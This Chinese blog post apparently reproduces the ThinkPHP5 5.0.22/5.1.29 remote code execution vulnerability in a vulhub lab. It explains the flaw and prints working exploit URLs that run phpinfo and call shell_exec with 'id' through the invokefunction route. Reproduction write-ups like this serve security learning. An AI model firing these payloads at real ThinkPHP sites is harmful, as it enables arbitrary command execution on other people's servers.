漏洞复现-ThinkPHP5-5-0-22-5-1-29-远程代码执行漏洞
title: 漏洞复现-ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
tags: 漏洞复现
abbrlink: 6d7b1ec8
date: 2023-02-07 08:46:22
环境: vulhub
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
参考链接:
- http://www.thinkphp.cn/topic/60400.html
- http://www.thinkphp.cn/topic/60390.html
- https://xz.aliyun.com/t/3570
漏洞环境
运行ThinkPHP 5.0.20版本:
环境启动
网页
复现
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
即可执行phpinfo:
- 漏洞成功利用
http://192.168.169.233:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
工具
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top